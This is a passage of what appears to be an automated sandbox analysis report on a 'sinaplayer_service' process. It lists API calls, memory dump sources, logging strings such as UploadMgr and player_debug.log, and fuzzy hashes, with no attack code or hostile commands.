                                                                                                                                                                                                    • wcslen.MSVCR120(?,?,?,00000000,00000007,?,6C581179,?,?,6C5811A0,0000000C), ref: 6C5AFD76
                                                                                                                                                                                                    • _calloc_crt.MSVCR120(00000001,00000002,?,?,?,00000000,00000007,?,6C581179,?,?,6C5811A0,0000000C), ref: 6C5AFD81
                                                                                                                                                                                                    • wcscpy_s.MSVCR120(00000000,00000001,?), ref: 6C5AFD97
                                                                                                                                                                                                    • _errno.MSVCR120(?,?,00000000,00000007,?,6C581179,?,?,6C5811A0,0000000C), ref: 6C5AFDA4
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(?,?,00000000,00000007,?,6C581179,?,?,6C5811A0,0000000C), ref: 6C5AFDAF
                                                                                                                                                                                                    • free.MSVCR120(?), ref: 6C5AFDCB
                                                                                                                                                                                                    • free.MSVCR120(00000000), ref: 6C5AFDEE
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ByteCharMultiWide_errno$_calloc_crt_invalid_parameter_noinfo_wcsnlenfreewcscpy_s$wcschr$strlenwcslen
                                                                                                                                                                                                    • String ID: xL
                                                                                                                                                                                                    • API String ID: 3308320376-2859553101
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ??0Thread@base@@QAE@PBD@Z.BASE(UploadMgrThread,8285FFAB), ref: 003772EE
                                                                                                                                                                                                    • ?current@MessageLoopProxy@base@@SA?AV?$scoped_refptr@VMessageLoopProxy@base@@@@XZ.BASE(00000038), ref: 00377305
                                                                                                                                                                                                    • ??0FilePath@base@@QAE@XZ.BASE ref: 0037731B
                                                                                                                                                                                                    • ??0FilePath@base@@QAE@XZ.BASE ref: 00377324
                                                                                                                                                                                                      • Part of subcall function 00377210: ??0FilePath@base@@QAE@XZ.BASE(8285FFAB,00000000,6C6C26A0,0000009C,00000000,00399564,000000FF), ref: 00377258
                                                                                                                                                                                                      • Part of subcall function 00377210: ?clear@FilePath@base@@QAEXXZ.BASE(?), ref: 0037728D
                                                                                                                                                                                                      • Part of subcall function 0037D390: ??2@YAPAXI@Z.MSVCR120(00000018,003773CB), ref: 0037D392
                                                                                                                                                                                                    • ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP120 ref: 00377487
                                                                                                                                                                                                    • ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z.MSVCP120(00000000,00000000), ref: 003774A7
                                                                                                                                                                                                    • ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP120 ref: 003774E1
                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 00377518
                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 00377535
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QBE_JXZ.MSVCP120(8285FFAB), ref: 00371937
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QBE_JXZ.MSVCP120 ref: 0037194E
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QBE_JXZ.MSVCP120 ref: 00371965
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP120(00000004,00000000), ref: 00371AC5
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?uncaught_exception@std@@YA_NXZ.MSVCP120 ref: 00371AD2
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP120 ref: 00371ADF
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371AEF
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371B03
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z.MSVCP120 ref: 00377552
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?flags@ios_base@std@@QBEHXZ.MSVCP120(?), ref: 003719B4
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 003719DE
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z.MSVCP120(?), ref: 003719E9
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371A08
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAE_JPBD_J@Z.MSVCP120(?,?,00000000), ref: 00371A18
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371A41
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z.MSVCP120(?), ref: 00371A4C
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QAE_J_J@Z.MSVCP120(00000000,00000000), ref: 00371A85
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@J@Z.MSVCP120 ref: 00377575
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z.MSVCP120 ref: 00377586
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z.MSVCP120 ref: 003775A0
                                                                                                                                                                                                    • OutputDebugStringA.KERNEL32(00000000,?), ref: 003775BE
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?), ref: 003775CD
                                                                                                                                                                                                    • ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP120 ref: 0037761B
                                                                                                                                                                                                    • ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP120 ref: 00377627
                                                                                                                                                                                                    • ??1?$basic_ios@_WU?$char_traits@_W@std@@@std@@UAE@XZ.MSVCP120 ref: 00377630
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: U?$char_traits@$D@std@@@std@@$V?$basic_streambuf@$?rdbuf@?$basic_ios@D@std@@@2@V01@$??6?$basic_ostream@?width@ios_base@std@@FilePath@base@@$?sputc@?$basic_streambuf@LoopMessageU?$char_traits@_W@std@@@std@@$??0?$basic_ios@??0?$basic_iostream@??0?$basic_streambuf@??1?$basic_ios@_??1?$basic_iostream@??1?$basic_streambuf@??2@??3@?clear@?current@?flags@ios_base@std@@?setstate@?$basic_ios@_?sputn@?$basic_streambuf@?uncaught_exception@std@@CountCurrentD@std@@@1@@DebugOsfx@?$basic_ostream@OutputProxy@base@@Proxy@base@@@@StringThreadThread@base@@TickV01@@V?$scoped_refptr@
                                                                                                                                                                                                    • String ID: )#sinaclient#[$)- $UploadMgr$UploadMgrThread$upload_mgr.cpp
                                                                                                                                                                                                    • API String ID: 3381690184-3722211712
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ??0FilePath@base@@QAE@XZ.BASE(8285FFAB), ref: 0037FB71
                                                                                                                                                                                                    • ?Get@PathService@@SA_NHPAVFilePath@base@@@Z.BASE(00000003,?), ref: 0037FB9F
                                                                                                                                                                                                    • ?Get@PathService@@SA_NHPAVFilePath@base@@@Z.BASE(000003EF,?), ref: 0037FBB8
                                                                                                                                                                                                    • ?Append@FilePath@base@@QBE?AV12@ABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@Z.BASE(?,?), ref: 0037FBEE
                                                                                                                                                                                                    • ??4FilePath@base@@QAEAAV01@ABV01@@Z.BASE(00000000), ref: 0037FC02
                                                                                                                                                                                                    • ??1FilePath@base@@QAE@XZ.BASE ref: 0037FC14
                                                                                                                                                                                                    • ?Get@PathService@@SA_NHPAVFilePath@base@@@Z.BASE(000003E9,?), ref: 0037FC31
                                                                                                                                                                                                    • ?Append@FilePath@base@@QBE?AV12@ABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@Z.BASE(?,?), ref: 0037FC67
                                                                                                                                                                                                    • ??4FilePath@base@@QAEAAV01@ABV01@@Z.BASE(00000000), ref: 0037FC7B
                                                                                                                                                                                                    • ??1FilePath@base@@QAE@XZ.BASE ref: 0037FC87
                                                                                                                                                                                                    • ??4FilePath@base@@QAEAAV01@ABV01@@Z.BASE(?), ref: 0037FCA2
                                                                                                                                                                                                    • ?Get@PathService@@SA_NHPAVFilePath@base@@@Z.BASE(000003E9,?), ref: 0037FCB4
                                                                                                                                                                                                    • ?Append@FilePath@base@@QBE?AV12@ABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@Z.BASE(?,?), ref: 0037FCEA
                                                                                                                                                                                                    • ??4FilePath@base@@QAEAAV01@ABV01@@Z.BASE(00000000), ref: 0037FCFE
                                                                                                                                                                                                    • ??1FilePath@base@@QAE@XZ.BASE ref: 0037FD10
                                                                                                                                                                                                    • ?PathExists@base@@YA_NABVFilePath@1@@Z.BASE(?), ref: 0038027F
                                                                                                                                                                                                    • ?CreateDirectoryW@base@@YA_NABVFilePath@1@@Z.BASE(?), ref: 00380290
                                                                                                                                                                                                    • ??4FilePath@base@@QAEAAV01@ABV01@@Z.BASE(?), ref: 003802A3
                                                                                                                                                                                                    • ??1FilePath@base@@QAE@XZ.BASE ref: 003802B5
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: File$Path@base@@$PathV01@V01@@$Get@Path@base@@@Service@@$Append@U?$char_traits@_V12@V?$allocator@_V?$basic_string@_W@2@@std@@@W@std@@$Path@1@@$CreateDirectoryExists@base@@W@base@@
                                                                                                                                                                                                    • String ID: $ClientCrashDumps$logs$player_debug.log
                                                                                                                                                                                                    • API String ID: 3723936409-3398229142
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP120(8285FFAB), ref: 003729ED
                                                                                                                                                                                                    • ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z.MSVCP120(?,00000000), ref: 00372A10
                                                                                                                                                                                                    • ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP120 ref: 00372A4A
                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 00372A84
                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 00372AA4
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QBE_JXZ.MSVCP120(8285FFAB), ref: 00371937
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QBE_JXZ.MSVCP120 ref: 0037194E
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QBE_JXZ.MSVCP120 ref: 00371965
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP120(00000004,00000000), ref: 00371AC5
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?uncaught_exception@std@@YA_NXZ.MSVCP120 ref: 00371AD2
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP120 ref: 00371ADF
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371AEF
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371B03
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z.MSVCP120 ref: 00372AC1
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?flags@ios_base@std@@QBEHXZ.MSVCP120(?), ref: 003719B4
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 003719DE
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z.MSVCP120(?), ref: 003719E9
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371A08
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAE_JPBD_J@Z.MSVCP120(?,?,00000000), ref: 00371A18
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371A41
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z.MSVCP120(?), ref: 00371A4C
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QAE_J_J@Z.MSVCP120(00000000,00000000), ref: 00371A85
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@J@Z.MSVCP120 ref: 00372AE4
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z.MSVCP120 ref: 00372AF5
                                                                                                                                                                                                    • ??6@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AAV01@PB_W@Z.BASE(00000000), ref: 00372B05
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z.MSVCP120 ref: 00372B10
                                                                                                                                                                                                    • OutputDebugStringA.KERNEL32(00000000,?), ref: 00372B2E
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?), ref: 00372B3D
                                                                                                                                                                                                    • ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP120 ref: 00372BA0
                                                                                                                                                                                                    • ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP120 ref: 00372BAC
                                                                                                                                                                                                    • ??1?$basic_ios@_WU?$char_traits@_W@std@@@std@@UAE@XZ.MSVCP120 ref: 00372BB5
                                                                                                                                                                                                    • InternetCloseHandle.WININET(?), ref: 00372BC9
                                                                                                                                                                                                    • InternetCloseHandle.WININET(00000001), ref: 00372BDA
                                                                                                                                                                                                    • InternetCloseHandle.WININET(00000001), ref: 00372BEA
                                                                                                                                                                                                    • ?_Unlock@?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAEXXZ.MSVCP120 ref: 00372BFD
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: U?$char_traits@$D@std@@@std@@$V01@V?$basic_streambuf@$?rdbuf@?$basic_ios@D@std@@@2@$??6?$basic_ostream@?width@ios_base@std@@$CloseHandleInternet$?sputc@?$basic_streambuf@U?$char_traits@_W@std@@@std@@$??0?$basic_ios@??0?$basic_iostream@??0?$basic_streambuf@??1?$basic_ios@_??1?$basic_iostream@??1?$basic_streambuf@??3@??6@?flags@ios_base@std@@?setstate@?$basic_ios@_?sputn@?$basic_streambuf@?uncaught_exception@std@@CountCurrentD@std@@@1@@DebugOsfx@?$basic_ostream@OutputStringThreadTickUnlock@?$basic_streambuf@V01@@V?$basic_ostream@
                                                                                                                                                                                                    • String ID: )#sinaliveupgrade#[$)- $ApnsHTTP.cpp$Close
                                                                                                                                                                                                    • API String ID: 1298611805-2357959525
                                                                                                                                                                                                    • Opcode ID: 34ebe9f7d9f1f3ab78c2593c04f093e4b4ff99b24c341d8f3cb29ff3e36d04b5
                                                                                                                                                                                                    • Instruction ID: 65cf2e00221dfb79a5ecdc08eb89339c10aec72640a223654a8eb6c306dd922e
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 34ebe9f7d9f1f3ab78c2593c04f093e4b4ff99b24c341d8f3cb29ff3e36d04b5
                                                                                                                                                                                                    • Instruction Fuzzy Hash: A1714175900209DFDB22DFA4DD4AB9EBBF8FF14304F008999E40AA7291DB75A944CF61
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP120(8285FFAB,00000000), ref: 0037C8E1
                                                                                                                                                                                                    • ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z.MSVCP120(?,00000000), ref: 0037C904
                                                                                                                                                                                                    • ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP120 ref: 0037C93E
                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 0037C978
                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 0037C995
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QBE_JXZ.MSVCP120(8285FFAB), ref: 00371937
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QBE_JXZ.MSVCP120 ref: 0037194E
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QBE_JXZ.MSVCP120 ref: 00371965
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP120(00000004,00000000), ref: 00371AC5
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?uncaught_exception@std@@YA_NXZ.MSVCP120 ref: 00371AD2
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP120 ref: 00371ADF
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371AEF
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371B03
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z.MSVCP120 ref: 0037C9B2
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?flags@ios_base@std@@QBEHXZ.MSVCP120(?), ref: 003719B4
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 003719DE
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z.MSVCP120(?), ref: 003719E9
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371A08
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAE_JPBD_J@Z.MSVCP120(?,?,00000000), ref: 00371A18
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371A41
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z.MSVCP120(?), ref: 00371A4C
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QAE_J_J@Z.MSVCP120(00000000,00000000), ref: 00371A85
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@J@Z.MSVCP120(?,?,?,?,?,?,?,00000000), ref: 0037C9D5
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z.MSVCP120(?,?,?,?,?,?,?,?,?,00000000), ref: 0037C9E6
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z.MSVCP120(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0037CA00
                                                                                                                                                                                                    • OutputDebugStringA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0037CA1E
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0037CA2D
                                                                                                                                                                                                    • ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP120 ref: 0037CA7E
                                                                                                                                                                                                    • ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP120 ref: 0037CA8A
                                                                                                                                                                                                    • ??1?$basic_ios@_WU?$char_traits@_W@std@@@std@@UAE@XZ.MSVCP120 ref: 0037CA93
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?,00000008), ref: 0037CB30
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: U?$char_traits@$D@std@@@std@@$V?$basic_streambuf@$?rdbuf@?$basic_ios@D@std@@@2@V01@$??6?$basic_ostream@?width@ios_base@std@@$??3@?sputc@?$basic_streambuf@U?$char_traits@_W@std@@@std@@$??0?$basic_ios@??0?$basic_iostream@??0?$basic_streambuf@??1?$basic_ios@_??1?$basic_iostream@??1?$basic_streambuf@?flags@ios_base@std@@?setstate@?$basic_ios@_?sputn@?$basic_streambuf@?uncaught_exception@std@@CountCurrentD@std@@@1@@DebugOsfx@?$basic_ostream@OutputStringThreadTickV01@@
                                                                                                                                                                                                    • String ID: )#sinaclient#[$)- $UploadMgr::UIQuit$upload_mgr.cpp
                                                                                                                                                                                                    • API String ID: 1631858441-2300907735
                                                                                                                                                                                                    • Opcode ID: 016fd62313670d7396b5adc81f2cbe3b83f842b94f53ca763c51fc093871a501
                                                                                                                                                                                                    • Instruction ID: 3f1c55c47042288e555f5208aff84a1fe742509ab14dd432dd073722370af06a
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 016fd62313670d7396b5adc81f2cbe3b83f842b94f53ca763c51fc093871a501
                                                                                                                                                                                                    • Instruction Fuzzy Hash: B1A18F71A002189FDB22DF68D889B9DBBF4FB04344F05C5A9E80EAB291D774AD48CF51
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP120(8285FFAB), ref: 00372467
                                                                                                                                                                                                    • ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z.MSVCP120(?,00000000), ref: 00372487
                                                                                                                                                                                                    • ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP120 ref: 003724C1
                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 003724F8
                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 00372515
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QBE_JXZ.MSVCP120(8285FFAB), ref: 00371937
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QBE_JXZ.MSVCP120 ref: 0037194E
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QBE_JXZ.MSVCP120 ref: 00371965
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP120(00000004,00000000), ref: 00371AC5
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?uncaught_exception@std@@YA_NXZ.MSVCP120 ref: 00371AD2
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP120 ref: 00371ADF
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371AEF
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371B03
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z.MSVCP120 ref: 00372532
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?flags@ios_base@std@@QBEHXZ.MSVCP120(?), ref: 003719B4
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 003719DE
